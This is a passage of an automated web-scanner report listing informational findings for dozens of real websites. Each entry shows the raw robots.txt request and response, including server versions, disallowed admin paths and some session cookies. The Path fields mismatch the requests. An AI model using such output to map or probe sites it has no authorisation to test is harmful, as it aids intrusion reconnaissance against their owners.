HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 28 Sep 2010 18:03:48 GMT
Accept-Ranges: bytes
ETag: "0daab7f375fcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:04 GMT
Connection: close
Content-Length: 333
Set-Cookie: ant=IdrBUoXid8+NdiLFM47TAUDWWq4Q3gOcqAL9K0lq6pI51Hco4tGmT2fCPFXBE56323Noa7PsKbmAzlKJm/SsdVb14xTcolHePXS06LLKQbwnTOEklw+4Ajc6i737g4ZzSX3f8PQLf6fa8oHMNGvbeTjpKFiFPw==; path=/

User-agent: *
Disallow: /wps/portal/chpmemberbcbsga/
Disallow: /wps/portal/chpvisitorbcbsga/
Disallow: /member/
Disallow: /visitor/
Disallow: /shared/noapplication/f0/s0/t0/
Disallow: /consumer
...[SNIP]...

26.151. http://www.beangroup.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beangroup.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beangroup.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:23 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sun, 04 Nov 2007 18:01:24 GMT
ETag: "c581ed-45-301d2500"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# All robots will spider the domain
User-agent: *
Disallow: /radar/

26.152. http://www.beautifulcervix.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beautifulcervix.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beautifulcervix.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=utf-8
Date: Tue, 03 May 2011 10:53:03 GMT
X-Pingback: http://www.beautifulcervix.com/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-nojneamh=61E8480EE956E9251E6745EBA8B7B20A; path=/
Content-Length: 24

User-agent: *
Disallow:

26.153. http://www.bebelsecurity26.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bebelsecurity26.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bebelsecurity26.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:25:31 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 14:37:32 GMT
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...

26.154. http://www.belcan.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.belcan.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.belcan.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:51 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Wed, 16 Sep 2009 13:55:25 GMT
ETag: "61e845-1d5-473b2402e6d40"
Accept-Ranges: bytes
Content-Length: 469
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Di
...[SNIP]...

26.155. http://www.beloblog.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beloblog.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beloblog.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/4.4.9
Last-Modified: Tue, 09 Mar 2010 08:10:39 GMT
ETag: "a34825c-44-48159b7965dc0"
Accept-Ranges: bytes
Content-Length: 68
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /tmp/

26.156. http://www.best-running-tips.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.best-running-tips.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.best-running-tips.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:09 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.best-running-tips.com/hszUFNcn.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dy
...[SNIP]...

26.157. http://www.bestbuypoolsupply.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bestbuypoolsupply.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bestbuypoolsupply.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:59 GMT
Server: Apache
Last-Modified: Fri, 16 May 2008 11:39:48 GMT
ETag: "c4045d-30-789ea900"
Accept-Ranges: bytes
Content-Length: 48
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /cgi-bestbuypoolsupply/

26.158. http://www.bestwesternmichigan.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bestwesternmichigan.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bestwesternmichigan.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:06:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 14 Feb 2011 18:13:50 GMT
ETag: "3cd263-3b-2777380"
Accept-Ranges: bytes
Content-Length: 59
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:/frameheader
Disallow: /businessplus

26.159. http://www.betfirms.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.betfirms.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.betfirms.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:18 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 15:17:21 GMT
Accept-Ranges: bytes
Content-Length: 1496
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

Sitemap: http://www.betfirms.com/sitemap.xml
Sitemap: http://www.betfirms.com/sitemap_index.xml.gz

User-agent: *
Disallow: /cgi-bin
Disallow: /blog/wp-admin
Disallow: /blog/wp-includes
Disallow: /blo
...[SNIP]...

26.160. http://www.bhgrealestate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhgrealestate.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bhgrealestate.com

Response

HTTP/1.1 200 OK
Content-Length: 434
Content-Type: text/plain
Content-Location: http://www.bhgrealestate.com/robots.txt
Last-Modified: Thu, 02 Apr 2009 21:30:31 GMT
Accept-Ranges: bytes
ETag: "fbb21240dab3c91:131c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:21:42 GMT
Connection: close
Set-Cookie: BIGipServervip_64.37.197.236_http=3442093834.20480.0000; path=/

...User-agent: *
Disallow: /AssetManagement/
Disallow: /Views/My/
Disallow: /Views/Shared/
Disallow: /Views/Yui/
Disallow: /Views/General/ContactAgent.aspx
Disallow: /View/General/LoginSubmit.as
...[SNIP]...

26.161. http://www.big1059.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.big1059.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.big1059.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
X-Pad: avoid browser bug
Content-Length: 275
X-Varnish: 4192187064
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 11:02:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:02:47 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

26.162. http://www.bigbrotheraccess.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigbrotheraccess.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigbrotheraccess.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:42 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Connection: close
Content-Type: text/plain; charset=UTF-8

#######################################################
# iRobots.txt SEO

# All Bots
User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /re
...[SNIP]...

26.163. http://www.bigcatcountry.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigcatcountry.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigcatcountry.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:56 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:38 GMT
ETag: "7e17e2-d0-49e83f79c2397"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

26.164. http://www.bignewsnetwork.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bignewsnetwork.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bignewsnetwork.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:35 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 01 Nov 2010 15:27:39 GMT
ETag: "67c70-1b2-493ff72cfb0c0"
Accept-Ranges: bytes
Content-Length: 434
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /incs/
Disallow: /forum/comment.php
Disallow: /forum/member.php
Disallow: /forum/poll.php
Disallow: /forum/newthread.php
Disallow: /forum/sendmessage.php
Disallow: /noframes.tx
...[SNIP]...

26.165. http://www.bikebling.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bikebling.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bikebling.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Sat, 02 May 2009 08:43:04 GMT
Accept-Ranges: bytes
ETag: "cd178a22cbc91:2186"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:34:49 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

26.166. http://www.biloxi.ms.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.biloxi.ms.us
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.biloxi.ms.us

Response

HTTP/1.1 200 OK
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 05 Apr 2005 22:07:58 GMT
Accept-Ranges: bytes
ETag: "f5a725ed2b3ac51:4e4a0"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:41:15 GMT
Connection: close

User-agent: *
Disallow: adovbs.inc
Disallow: /images/
Disallow: BiloxiServerInfo.zip
Disallow: /DB/
Disallow: /newsletter/
Disallow: search.asp
Disallow: /staff/
Disallow: /vincent/

26.167. http://www.bimvid.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bimvid.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bimvid.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:20 GMT
Server: VoxCAST
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u7-b5
Via: 1.0 dv-c1-r2-u7-b4:3128 (squid)
X-Cache: MISS from VoxCAST
Last-Modified: Thu, 03 Mar 2011 17:03:27 GMT
Content-Length: 934
Connection: close
Content-Type: text/html;charset=utf-8

User-agent: *
Disallow: /documents/KY3+History.xls
Disallow: /results
Disallow: /internal
Disallow: /search
Disallow: /searchresults
Disallow: /southwest/southwestdesc
Disallow: /southwest/n
...[SNIP]...

26.168. http://www.black-friday.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.black-friday.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.black-friday.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:30 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 01 Sep 2010 17:14:39 GMT
Accept-Ranges: bytes
Content-Length: 340
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /product/
Disallow: /site/
Disallow: /shop/
Disallow: /early/
Disallow: /thanks/
Disallow: /storelocator/
Disallow: /email-submit/
D
...[SNIP]...

26.169. http://www.blackpast.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackpast.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackpast.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:28 GMT
Server: {Anass atef) By (XP.Net.Sa) Security Apache
Last-Modified: Mon, 21 Jul 2008 05:55:30 GMT
ETag: "fdd512-660-452825ad55880"
Accept-Ranges: bytes
Content-Length: 1632
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.2 2008/02/25 02:18:25 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

26.170. http://www.blackshoediaries.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackshoediaries.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackshoediaries.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:55:38 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:38 GMT
ETag: "8281b-d0-49e83f79b6018"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

26.171. http://www.blippitt.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blippitt.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blippitt.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blippitt.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: PHPSESSID=eef93eeab1da78f1ed72d9f1cd63325c; path=/
Set-Cookie: wwsgd_visits=1; expires=Wed, 02-May-2012 10:38:38 GMT; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# This virtual robots.txt file was created by the PC Robots.txt WordPress plugin.
# For more info visit: http://petercoughlin.com/robotstxt-wordpress-plugin/

User-agent: Alexibot
Disallow: /

User
...[SNIP]...

26.172. http://www.bloomu.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bloomu.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bloomu.edu

Response

HTTP/1.1 200 OK
Set-Cookie: LBSRVwww=KRXUOUScassiniCKOLI; domain=.bloomu.edu; path=/
Date: Tue, 03 May 2011 10:56:48 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 03 Jan 2011 14:01:56 GMT
ETag: "624-498f198445d00"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:56:48 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.173. http://www.bobthebuilder.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bobthebuilder.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bobthebuilder.com

Response

HTTP/1.0 200 OK
Content-Length: 100
Content-Type: text/plain
Last-Modified: Mon, 12 Sep 2005 10:26:03 GMT
Accept-Ranges: bytes
ETag: "58b19c6084b7c51:131a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:31:26 GMT
Connection: close

# Robots.txt file from http://
#
# All robots will spider the domain

User-agent: *
Disallow:

26.174. http://www.bookmaker.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bookmaker.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bookmaker.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 11:42:46 GMT
Content-Type: text/plain
Connection: close
Content-Length: 41
Content-Location: http://www.bookmaker.com/robots.txt
Last-Modified: Thu, 17 Feb 2011 16:44:34 GMT
Accept-Ranges: bytes
ETag: "dd8f40f5c1cecb1:7c7"

User-agent: *
Disallow: /WebResource.axd

26.175. http://www.booksonboard.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.booksonboard.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.booksonboard.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:41 GMT
Server: Apache
Last-Modified: Tue, 05 May 2009 17:35:21 GMT
ETag: "3c78056-3ac-4692db3fd2840"
Accept-Ranges: bytes
Content-Length: 940
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_private/
Disallow: /_vti_bin/
Disallow: /_vti_cnf/
Disallow: /_vti_log/
Disallow: /_vti_pvt/
Disallow: /_vti_txt/
Disallow: /account/
Disallow: /AdeptTools/
Disallow: /admin/
...[SNIP]...

26.176. http://www.booksshouldbefree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.booksshouldbefree.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.booksshouldbefree.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:25 GMT
Server: Apache
Last-Modified: Sat, 16 Oct 2010 16:42:34 GMT
ETag: "8041482-3c-492bea145f280"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /download/
Disallow: /book/carousel/

26.177. http://www.boomboomflicks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boomboomflicks.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boomboomflicks.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:39 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Thu, 09 Dec 2010 21:08:46 GMT
ETag: "22417f0-26-49700a4b93ecd"
Accept-Ranges: bytes
Content-Length: 38
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/atx/

26.178. http://www.boomkat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boomkat.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boomkat.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Cache-Control: max-age=31536000
Content-Type: text/plain
Content-Location: http://www.boomkat.com/robots.txt
Date: Tue, 03 May 2011 10:41:00 GMT
Accept-Ranges: bytes
ETag: "982de61bf64cc1:13d3"
Connection: close
Last-Modified: Wed, 27 Apr 2011 16:13:56 GMT
X-Powered-By: ASP.NET
Content-Length: 201

User-agent: *
Disallow: /secure/
Disallow: /include/
Disallow: /jukebox/
Disallow: /com/
Disallow: /emailTemplates/
Disallow: /wap/
Disallow: /probes/
Disallow: /scheduled_tasks/
Disallow: /components
...[SNIP]...

26.179. http://www.borla.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.borla.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.borla.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 28 Dec 2010 02:54:58 GMT
Accept-Ranges: bytes
ETag: "b431de9c3aa6cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:02:16 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

26.180. http://www.boyunknown.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boyunknown.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boyunknown.com

Response

HTTP/1.1 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Mon, 25 Oct 2010 22:28:00 GMT
Accept-Ranges: bytes
ETag: "677c6be19374cb1:2ab08"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:50:36 GMT
Connection: close

User-agent: *
Disallow: /ad-counter/*

26.181. http://www.boyvipdream.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boyvipdream.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boyvipdream.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:25:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.boyvipdream.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.boyvipdream.com/sitemap.xml.gz

26.182. http://www.bravewords.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bravewords.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bravewords.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-198285466"
Last-Modified: Mon, 19 Jul 2010 21:55:49 GMT
Content-Length: 127
Connection: close
Date: Tue, 03 May 2011 11:35:09 GMT
Server: lighttpd/1.4.26

# All robots will spider the domain

User-agent: *
Disallow:

# Disallow directory /static/
User-agent: *
Disallow: /static/

26.183. http://www.brazilianbikinishop.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brazilianbikinishop.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brazilianbikinishop.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:00 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16 mod_ssl/2.2.3 OpenSSL/0.9.8c
Last-Modified: Fri, 11 Jun 2010 10:04:46 GMT
ETag: "c0b7-7bb-44c88b80"
Accept-Ranges: bytes
Content-Length: 1979
Connection: close
Content-Type: text/plain

# CRELoaded Generated Robots.txt
# Robot Exclusion File -- robots.txt
# Author: CRELoaded Team
# Last Updated : September 11th, 2007

User-Agent: *
Disallow: /admin/
Disallow: /cache/
Disallow: /cer
...[SNIP]...

26.184. http://www.breastfeeding.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.breastfeeding.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.breastfeeding.com

Response

HTTP/1.1 200 OK
Age: 59
Date: Tue, 03 May 2011 10:29:30 GMT
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "1913f8-65-46544b5049300"
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 16 Mar 2009 23:21:16 GMT
Accept-Ranges: bytes
Content-Length: 101
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /include/
Disallow: /design/
Disallow: /plugins/
Disallow: /site/

26.185. http://www.brenhambanner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brenhambanner.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brenhambanner.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Tue, 03 May 2011 10:39:07 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: brenhambanner.com
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

26.186. http://www.brighthorizons.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brighthorizons.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brighthorizons.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 14 Apr 2011 15:08:02 GMT
Accept-Ranges: bytes
ETag: "0758ebfb5facb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
ws: 2
Date: Tue, 03 May 2011 11:23:29 GMT
Connection: close
Content-Length: 1084

# /robots.txt file for http://www.brighthorizons.com

User-agent: *
Disallow: /prp/
User-agent: *
Disallow: http://www.brighthorizons.com/events/index.htm
User-agent: *
Disallow: http://centers
...[SNIP]...

26.187. http://www.broadbandinfo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.broadbandinfo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.broadbandinfo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:09 GMT
Server: Apache
Last-Modified: Wed, 30 Sep 2009 16:04:34 GMT
ETag: "40000d-16e-afd60880"
Accept-Ranges: bytes
Content-Length: 366
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 5
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /librari
...[SNIP]...

26.188. http://www.broadbandsports.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.broadbandsports.com
Path:	/favicon.ico

Issue detail

